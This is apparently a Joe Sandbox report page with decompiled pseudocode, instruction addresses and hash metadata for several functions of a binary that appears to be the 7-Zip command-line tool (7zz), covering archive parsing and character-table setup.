							if( *(_t187 - 0x10) <= 0) {
								L32:
								if( *((intOrPtr*)(_t148 + 0x30)) != 1) {
									_t118 = E0042D0F8(_t156);
								}
								L36:
								 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
								return _t118;
							}
							_t174 =  *((intOrPtr*)(_t148 + 0x1c));
							do {
								if(_t174 <= 0) {
									L27:
									_t156 = 0xffffffff;
									L28:
									if(_t156 < 0) {
										_t156 =  *((intOrPtr*)(_t187 + 8));
										_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), _t186);
										goto L32;
									}
									goto L29;
								}
								_t118 =  *((intOrPtr*)(_t148 + 0x20));
								while( *_t118 != _t186) {
									_t156 = 1;
									_t118 = _t118 + 8;
									if(1 < _t174) {
										continue;
									}
									goto L27;
								}
								goto L28;
								L29:
								_t186 = _t186 + 1;
							} while (_t186 <  *(_t187 - 0x10));
							goto L32;
						}
					}
					 *((intOrPtr*)(_t187 - 0x24)) = _t117;
					do {
						 *(_t187 - 0x2c) = E0042D241(_t173);
						_t122 = E0042D241(_t173);
						_t155 = _t177;
						L0042389F(_t177,  *(_t187 - 0x2c), _t122);
						_t92 = _t187 - 0x24;
						 *_t92 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
					} while ( *_t92 != 0);
					goto L18;
				}
				 *((intOrPtr*)(_t187 - 0x24)) = _t176;
				do {
					 *(_t187 - 0x50) =  *(_t187 - 0x50) & 0x00000000;
					 *(_t187 - 0x4c) =  *(_t187 - 0x4c) & 0x00000000;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
					_push(_t187 - 0x5c);
					E00428C94(_t148);
					 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					L00407A18( *(_t187 - 0x4c));
					_t182 =  *( *((intOrPtr*)(_t148 + 0xc)) +  *(_t148 + 8) * 4 - 4);
					_t128 = E0042D110( *((intOrPtr*)(_t184 + 0x18)));
					_t167 =  *((intOrPtr*)(_t184 + 0x18));
					 *(_t187 + 0xb) = _t128;
					 *(_t187 - 0x14) = _t128 & 0x0000000f;
					E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t187 - 0x3c, _t128 & 0x0000000f);
					_t132 =  *(_t187 - 0x14);
					if(_t132 > 8) {
						E0042D0F8(_t167);
						_t132 =  *(_t187 - 0x14);
					}
					_t168 = 0;
					 *(_t187 - 0x2c) = 0;
					 *(_t187 - 0x28) = 0;
					if(_t132 > 0) {
						 *((intOrPtr*)(_t187 - 0x18)) = 0;
						 *(_t187 - 0x14) = _t187 + _t132 - 0x3d;
						 *(_t187 - 0x20) = _t132;
						do {
							_t168 =  *((intOrPtr*)(_t187 - 0x18));
							asm("cdq");
							 *(_t187 - 0x2c) =  *(_t187 - 0x2c) | E0046C5A0( *( *(_t187 - 0x14)) & 0x000000ff,  *((intOrPtr*)(_t187 - 0x18)), _t173);
							 *(_t187 - 0x28) =  *(_t187 - 0x28) | _t173;
							 *(_t187 - 0x14) =  *(_t187 - 0x14) - 1;
							 *((intOrPtr*)(_t187 - 0x18)) =  *((intOrPtr*)(_t187 - 0x18)) + 8;
							_t49 = _t187 - 0x20;
							 *_t49 =  *(_t187 - 0x20) - 1;
						} while ( *_t49 != 0);
					}
					 *_t182 =  *(_t187 - 0x2c);
					_t182[1] =  *(_t187 - 0x28);
					if(( *(_t187 + 0xb) & 0x00000010) == 0) {
						_t135 = 1;
						_t182[5] = _t135;
					} else {
						_t182[5] = E0042D241(_t173);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						_t135 = E0042D241(_t173);
					}
					_t182[6] = _t135;
					if(( *(_t187 + 0xb) & 0x00000020) != 0) {
						_t139 = E0042D241(_t173);
						_t66 =  &(_t182[2]); // 0x107
						 *(_t187 - 0x20) = _t139;
						L0040FA26(_t66, _t139);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t182[4],  *(_t187 - 0x20));
					}
					if(( *(_t187 + 0xb) & 0x00000080) != 0) {
						E0042D0F8(_t168);
					}
					 *(_t187 - 0x10) =  *(_t187 - 0x10) + _t182[5];
					 *(_t187 - 0x1c) =  *(_t187 - 0x1c) + _t182[6];
					_t80 = _t187 - 0x24;
					 *_t80 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
				} while ( *_t80 != 0);
				goto L15;
			}






















                                                                                  0x0042d5f3
                                                                                  0x0042d5f8
                                                                                  0x0042d602
                                                                                  0x0042d608
                                                                                  0x0042d60d
                                                                                  0x0042d610
                                                                                  0x0042d614
                                                                                  0x0042d61c
                                                                                  0x0042d621
                                                                                  0x0042d625
                                                                                  0x0042d62b
                                                                                  0x0042d74c
                                                                                  0x0042d74f
                                                                                  0x0042d755
                                                                                  0x0042d758
                                                                                  0x0042d760
                                                                                  0x0042d762
                                                                                  0x0042d767
                                                                                  0x0042d76c
                                                                                  0x0042d794
                                                                                  0x0042d794
                                                                                  0x0042d79a
                                                                                  0x0042d79c
                                                                                  0x0042d79c
                                                                                  0x0042d7a1
                                                                                  0x0042d7a4
                                                                                  0x0042d7a7
                                                                                  0x0042d7ab
                                                                                  0x0042d7b3
                                                                                  0x0042d7fb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042d7fd
                                                                                  0x0042d7fd
                                                                                  0x0042d809
                                                                                  0x0042d80e
                                                                                  0x0042d80e
                                                                                  0x00000000
                                                                                  0x0042d7b5
                                                                                  0x0042d7b5
                                                                                  0x0042d7ba
                                                                                  0x0042d7ec
                                                                                  0x0042d7f0
                                                                                  0x0042d7f2
                                                                                  0x0042d7f2
                                                                                  0x0042d811
                                                                                  0x0042d817
                                                                                  0x0042d81f
                                                                                  0x0042d81f
                                                                                  0x0042d7bc
                                                                                  0x0042d7bf
                                                                                  0x0042d7c3
                                                                                  0x0042d7d4
                                                                                  0x0042d7d4
                                                                                  0x0042d7d7
                                                                                  0x0042d7d9
                                                                                  0x0042d7e3
                                                                                  0x0042d7e7
                                                                                  0x00000000
                                                                                  0x0042d7e7
                                                                                  0x00000000
                                                                                  0x0042d7d9
                                                                                  0x0042d7c5
                                                                                  0x0042d7c8
                                                                                  0x0042d7cc
                                                                                  0x0042d7cd
                                                                                  0x0042d7d2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042d7d2
                                                                                  0x00000000
                                                                                  0x0042d7db
                                                                                  0x0042d7db
                                                                                  0x0042d7dc
                                                                                  0x00000000
                                                                                  0x0042d7e1
                                                                                  0x0042d7b3
                                                                                  0x0042d76e
                                                                                  0x0042d771
                                                                                  0x0042d77c
                                                                                  0x0042d77f
                                                                                  0x0042d785
                                                                                  0x0042d78a
                                                                                  0x0042d78f
                                                                                  0x0042d78f
                                                                                  0x0042d78f
                                                                                  0x00000000
                                                                                  0x0042d771
                                                                                  0x0042d631
                                                                                  0x0042d634
                                                                                  0x0042d634
                                                                                  0x0042d638
                                                                                  0x0042d641
                                                                                  0x0042d644
                                                                                  0x0042d64b
                                                                                  0x0042d64e
                                                                                  0x0042d656
                                                                                  0x0042d65a
                                                                                  0x0042d65d
                                                                                  0x0042d669
                                                                                  0x0042d670
                                                                                  0x0042d675
                                                                                  0x0042d678
                                                                                  0x0042d67e
                                                                                  0x0042d686
                                                                                  0x0042d68b
                                                                                  0x0042d691
                                                                                  0x0042d693
                                                                                  0x0042d698
                                                                                  0x0042d698
                                                                                  0x0042d69b
                                                                                  0x0042d69f
                                                                                  0x0042d6a2
                                                                                  0x0042d6a5
                                                                                  0x0042d6a7
                                                                                  0x0042d6ae
                                                                                  0x0042d6b1
                                                                                  0x0042d6b4
                                                                                  0x0042d6b7
                                                                                  0x0042d6bd
                                                                                  0x0042d6c3
                                                                                  0x0042d6c6
                                                                                  0x0042d6c9
                                                                                  0x0042d6cc
                                                                                  0x0042d6d0
                                                                                  0x0042d6d0
                                                                                  0x0042d6d0
                                                                                  0x0042d6b4
                                                                                  0x0042d6dc
                                                                                  0x0042d6e1
                                                                                  0x0042d6e4
                                                                                  0x0042d6fd
                                                                                  0x0042d6fe
                                                                                  0x0042d6e6
                                                                                  0x0042d6ee
                                                                                  0x0042d6f1
                                                                                  0x0042d6f4
                                                                                  0x0042d6f4
                                                                                  0x0042d705
                                                                                  0x0042d708
                                                                                  0x0042d70d
                                                                                  0x0042d713
                                                                                  0x0042d716
                                                                                  0x0042d719
                                                                                  0x0042d721
                                                                                  0x0042d727
                                                                                  0x0042d727
                                                                                  0x0042d730
                                                                                  0x0042d732
                                                                                  0x0042d732
                                                                                  0x0042d73a
                                                                                  0x0042d740
                                                                                  0x0042d743
                                                                                  0x0042d743
                                                                                  0x0042d743
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042D5F8
                                                                                    • Part of subcall function 00428C94: __EH_prolog.LIBCMT ref: 00428C99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: $c[@
                                                                                  • API String ID: 3519838083-1303465990
                                                                                  • Opcode ID: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                                  • Instruction ID: f7f276ab7b0e8e4aae64a949967b144445a492cbfe2f6d3bc49d51a0f31881ab
                                                                                  • Opcode Fuzzy Hash: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                                  • Instruction Fuzzy Hash: F9717070E002159BCF14EFA9D4816EEB7B1BF84314F50451FE856B7292CB3CA945CBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042CD7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0042CD7D(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				L0046B890(0x4774bc, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E00404AD0(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x47ab08;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x47a668;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x47a668;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E00415C6D(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E00415C6D(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E00408604(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E00408604(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                                                                                  0x0042cd82
                                                                                  0x0042cd8f
                                                                                  0x0042cd98
                                                                                  0x0042cf99
                                                                                  0x0042cf99
                                                                                  0x0042cda8
                                                                                  0x0042cdad
                                                                                  0x0042cdb2
                                                                                  0x0042cdbf
                                                                                  0x0042cdc7
                                                                                  0x0042cdca
                                                                                  0x0042cdcf
                                                                                  0x0042cdd4
                                                                                  0x0042cdf2
                                                                                  0x0042cdf2
                                                                                  0x0042cdf7
                                                                                  0x0042ce15
                                                                                  0x0042ce1b
                                                                                  0x0042ce20
                                                                                  0x0042ce25
                                                                                  0x0042ce44
                                                                                  0x0042ce44
                                                                                  0x0042ce4b
                                                                                  0x0042ce54
                                                                                  0x0042ce5b
                                                                                  0x0042ce64
                                                                                  0x0042ce65
                                                                                  0x0042ce68
                                                                                  0x0042ce6b
                                                                                  0x0042ce6e
                                                                                  0x0042ce71
                                                                                  0x0042ce74
                                                                                  0x0042ce7b
                                                                                  0x0042ce7e
                                                                                  0x0042ce81
                                                                                  0x0042ce84
                                                                                  0x0042ce87
                                                                                  0x0042ce8d
                                                                                  0x0042ce91
                                                                                  0x0042ce94
                                                                                  0x0042ce96
                                                                                  0x0042ce9c
                                                                                  0x0042ce9f
                                                                                  0x0042cea5
                                                                                  0x0042cea7
                                                                                  0x0042cead
                                                                                  0x0042ceb2
                                                                                  0x0042ceb8
                                                                                  0x0042cea7
                                                                                  0x0042cec0
                                                                                  0x0042cec3
                                                                                  0x0042cec5
                                                                                  0x0042cecb
                                                                                  0x0042ced0
                                                                                  0x0042ced6
                                                                                  0x0042cec5
                                                                                  0x0042cedb
                                                                                  0x0042cee1
                                                                                  0x0042ce96
                                                                                  0x0042cee6
                                                                                  0x0042ceeb
                                                                                  0x0042ceed
                                                                                  0x0042cefb
                                                                                  0x0042cf11
                                                                                  0x0042cf13
                                                                                  0x0042cf14
                                                                                  0x0042cf19
                                                                                  0x0042cf19
                                                                                  0x0042cf1e
                                                                                  0x0042cf22
                                                                                  0x0042cf27
                                                                                  0x0042cf2e
                                                                                  0x0042cf33
                                                                                  0x0042cf39
                                                                                  0x0042cf40
                                                                                  0x0042cf40
                                                                                  0x0042cf43
                                                                                  0x0042cf49
                                                                                  0x0042cf4c
                                                                                  0x0042cf50
                                                                                  0x0042cf55
                                                                                  0x0042cf59
                                                                                  0x0042cf59
                                                                                  0x0042cf5b
                                                                                  0x0042cf5e
                                                                                  0x0042cf61
                                                                                  0x0042cf67
                                                                                  0x0042cf6a
                                                                                  0x0042cf6a
                                                                                  0x0042cf6a
                                                                                  0x0042cf6f
                                                                                  0x0042cf75
                                                                                  0x0042cf79
                                                                                  0x0042cf7e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042cf80
                                                                                  0x0042cf81
                                                                                  0x0042cf87
                                                                                  0x00000000
                                                                                  0x0042cf89
                                                                                  0x0042cf89
                                                                                  0x0042cf89
                                                                                  0x00000000
                                                                                  0x0042cf87
                                                                                  0x00000000
                                                                                  0x0042ce27
                                                                                  0x0042ce27
                                                                                  0x0042ce3e
                                                                                  0x0042ce42
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ce42
                                                                                  0x00000000
                                                                                  0x0042ce27
                                                                                  0x0042cdf9
                                                                                  0x0042cdf9
                                                                                  0x0042ce0f
                                                                                  0x0042ce13
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ce13
                                                                                  0x00000000
                                                                                  0x0042cdf9
                                                                                  0x0042cdd6
                                                                                  0x0042cdd6
                                                                                  0x0042cdec
                                                                                  0x0042cdf0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042cdf0
                                                                                  0x0042cf8d
                                                                                  0x0042cf8d
                                                                                  0x0042cf94
                                                                                  0x00000000
                                                                                  0x0042cf94
                                                                                  0x0042cdd4
                                                                                  0x0042cf9b
                                                                                  0x0042cfa1
                                                                                  0x0042cfa9

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: $
                                                                                  • API String ID: 3519838083-227171996
                                                                                  • Opcode ID: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                                  • Instruction ID: 5d0b406c18202b3f46059241855fa713d8f087d48a2dc57dffdc94942331e0a4
                                                                                  • Opcode Fuzzy Hash: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                                  • Instruction Fuzzy Hash: A871AB71A0021ACFCB20CF99E5C0AEEB7B2FF48318F51456ED416A7291D734AA46CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00471A83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E00471A83(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x496228,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00472375(1,  &_v280, 0x100,  &_v1304,  *0x496228,  *0x496444, 0);
						E00472126( *0x496444, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x496228, 0);
						E00472126( *0x496444, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x496228, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x496240) =  *(_t55 + 0x496240) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x496240) = _t77;
								goto L16;
							}
							 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x496240) =  *(_t43 + 0x496240) & 0x00000000;
						} else {
							 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x496240) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                                                                  0x00471aa0
                                                                                  0x00471aa6
                                                                                  0x00471aad
                                                                                  0x00471aad
                                                                                  0x00471ab4
                                                                                  0x00471ab5
                                                                                  0x00471ab9
                                                                                  0x00471abc
                                                                                  0x00471ac5
                                                                                  0x00471afe
                                                                                  0x00471b1d
                                                                                  0x00471b41
                                                                                  0x00471b69
                                                                                  0x00471b71
                                                                                  0x00471b73
                                                                                  0x00471b79
                                                                                  0x00471b79
                                                                                  0x00471b7f
                                                                                  0x00471b9a
                                                                                  0x00471bac
                                                                                  0x00000000
                                                                                  0x00471bac
                                                                                  0x00471b9c
                                                                                  0x00471ba3
                                                                                  0x00471b8f
                                                                                  0x00471b8f
                                                                                  0x00000000
                                                                                  0x00471b8f
                                                                                  0x00471b81
                                                                                  0x00471b88
                                                                                  0x00000000
                                                                                  0x00471bb3
                                                                                  0x00471bb3
                                                                                  0x00471bb5
                                                                                  0x00471bb6
                                                                                  0x00000000
                                                                                  0x00471b79
                                                                                  0x00471ac9
                                                                                  0x00471acc
                                                                                  0x00471acc
                                                                                  0x00471acf
                                                                                  0x00471ad4
                                                                                  0x00471ad8
                                                                                  0x00471adf
                                                                                  0x00471ae7
                                                                                  0x00471af1
                                                                                  0x00471af1
                                                                                  0x00471af1
                                                                                  0x00471af4
                                                                                  0x00471af5
                                                                                  0x00471af8
                                                                                  0x00000000
                                                                                  0x00471afd
                                                                                  0x00471bbc
                                                                                  0x00471bc3
                                                                                  0x00471bc6
                                                                                  0x00471be4
                                                                                  0x00471bf9
                                                                                  0x00471beb
                                                                                  0x00471beb
                                                                                  0x00471bf4
                                                                                  0x00000000
                                                                                  0x00471bf4
                                                                                  0x00471bcd
                                                                                  0x00471bcd
                                                                                  0x00471bd6
                                                                                  0x00471bd9
                                                                                  0x00471bd9
                                                                                  0x00471bd9
                                                                                  0x00471c00
                                                                                  0x00471c01
                                                                                  0x00471c07

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $
                                                                                  • API String ID: 1807457897-3032137957
                                                                                  • Opcode ID: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
